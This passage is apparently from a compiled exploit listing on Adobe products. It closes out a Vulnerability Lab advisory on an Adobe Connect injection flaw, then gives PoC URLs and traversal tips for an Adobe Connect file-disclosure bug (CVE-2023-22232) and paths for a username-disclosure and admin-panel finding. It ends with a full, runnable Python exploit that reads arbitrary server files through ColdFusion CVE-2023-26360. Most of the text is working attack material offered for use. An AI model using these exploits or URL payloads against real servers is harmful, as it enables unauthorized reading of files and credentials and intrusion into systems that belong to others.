connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect]


Reference(s):
https://events-na1.adobeconnect.com/
https://events-na1.adobeconnect.com/content/
https://events-na1.adobeconnect.com/content/connect/
https://events-na1.adobeconnect.com/content/connect/connect-action


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable firstname, lastname and companyname input fields in 
the registration file POST method request.
Dissallow the usage of special chars and restrict the input to prevent further script code injection attacks.
Encode the email body context of the adobe connect service mails after the registration. Block script code tags or escape and encode them as well.

Please follow the instructions in the adobe security bulletin to resolve the issue - Adobe Connect 	9.5.7 windows desktop version.
URL: https://helpx.adobe.com/adobe-connect/release-note/adobe-connect-9-5-7-release-notes.html


Security Risk:
==============
The security risk of the application-side vulnerability in the events webinar web-application and windows desktop software is estimated as medium. (CVSS 3.7)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
HireHackking 
# Title: Adobe Connect 11.4.5 - Local File Disclosure 
# Author: h4shur
# date:2021.01.16-2023.02.17
# CVE: CVE-2023-22232
# Vendor Homepage: https://www.adobe.com
# Software Link: https://www.adobe.com/products/adobeconnect.html
# Version: 11.4.5 and earlier, 12.1.5 and earlier
# User interaction: None
# Tested on: Windows 10 & Google Chrome, kali linux & firefox

### Summary:
Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature.
Exploitation of this issue does not require user interaction.

### Description :
There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team.
* What is LFD bug?
LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug
* Intruder access level with LFD bug
The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access
* Identify vulnerable sites
To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file
* And this time the "lfd" in "adobe connect" bug:
To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable.
You can download the file by writing the file path and file name and extension.
When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer
file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file.
* There are values inside the url that do not allow a file other than this file to be downloaded.
* Values: sco_id and tickets
But if these values are cleared, you will see that reloading is possible without any obstacles
At another address, you can download multiple files as a zip file.
We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension.

### POC :
https://target.com/[folder]/download?download-url=[URL]&name=[file.type]
https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder]

### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232
https://nvd.nist.gov/vuln/detail/CVE-2023-22232
https://helpx.adobe.com/security/products/connect/apsb23-05.html
HireHackking 
# Title: Adobe Connect 10 - Username Disclosure
# Author: h4shur
# date:2021-02-07
# Vendor Homepage: https://www.adobe.com
# Software Link: https://www.adobe.com/products/adobeconnect.html
# Version:  10 and earlier
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs

### Description :

By adding this (/system/help/support) to the end of the desired website address, you can view the username without any filter or obstacle. Sometimes even without a username and password. And by adding (/system/login) to the end of the desired website address, you can access the admin panel without any filters.

### POC :
site.com/system/help/support

### Admin Panel :
site.com/system/login
HireHackking 
# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360
# Google Dork: [not]
# Date: [12/28/2023]
# Exploit Author: [Youssef Muhammad]
# Vendor Homepage: [
https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
# Software Link: [
https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and
earlier]
# Tested on: [Windows, Linux]
# CVE : [CVE-2023-26360]

import sys
import requests
import json

BANNER = """
   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████  
  ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████ 
  ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██ 
  ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██ 
   ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       
"""

RED_COLOR = "\033[91m"
GREEN_COLOR = "\032[42m"
RESET_COLOR = "\033[0m"

def print_banner():
    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)
    return 0

def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
    if not endpoint.endswith('.cfc'):
        endpoint += '.cfc'

    if target_file.endswith('.cfc'):
        raise ValueError('The TARGET_FILE must not point to a .cfc')

    targeted_file = f"a/{target_file}"
    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})

    vars_get = {'method': 'test', '_cfclient': 'true'}
    uri = f'{host}{endpoint}'

    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)

    file_data = None
    splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'

    if response.status_code in [404, 500] and splatter in response.text:
        file_data = response.text.split(splatter, 1)[0]

    if file_data is None:
        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')

    print(file_data)

    # Save the output to a file
    output_file_name = 'output.txt'
    with open(output_file_name, 'w') as output_file:
        output_file.write(file_data)
        print(f"The output saved to {output_file_name}")

if __name__ == "__main__":
    if not 3 <= len(sys.argv) <= 5:
        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
        sys.exit(1)

    print_banner()

    host = sys.argv[1]
    target_file = sys.argv[2]
    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"
    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None

    try:
        run_exploit(host, target_file, endpoint, proxy_url)
    except Exception as e:
        print(f"Error: {e}")